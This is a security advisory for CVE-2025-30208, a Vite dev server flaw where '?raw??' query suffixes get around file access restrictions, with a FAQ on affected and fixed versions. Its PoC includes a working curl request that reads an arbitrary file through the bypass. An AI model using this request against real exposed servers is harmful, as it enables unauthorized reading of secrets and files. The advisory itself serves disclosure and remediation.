CVE-2025-30208: Vite bypasses server.fs.deny when using `?raw??`
### Summary The contents of arbitrary files can be returned to the browser. ### Impact Only apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected. ### Details `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. ### PoC ```bash $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev $ echo "top secret content" > /tmp/secret.txt # expected behaviour $ curl "http://localhost:5173/@fs/tmp/secret.txt" <body> <h1>403 Restricted</h1> <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list. # security bypassed $ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??" export default "top secret content\n" //# sourceMappingURL=data:application/json;base64,eyJ2... ```
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2025-30208?
CVE-2025-30208 is considered a high severity vulnerability due to the potential for unauthorized file access.
How do I fix CVE-2025-30208?
To fix CVE-2025-30208, update Vite to versions 6.2.3 or later, 6.1.2 or later, 6.0.12 or later, 5.4.15 or later, or 4.5.10 or later.
What versions of Vite are affected by CVE-2025-30208?
Versions of Vite prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 are affected by CVE-2025-30208.
What type of vulnerability is CVE-2025-30208?
CVE-2025-30208 is a vulnerability that involves improper access control, allowing bypass of file access restrictions.
What can an attacker do with CVE-2025-30208?
An attacker can exploit CVE-2025-30208 to access files outside of the allowed list by manipulating URLs.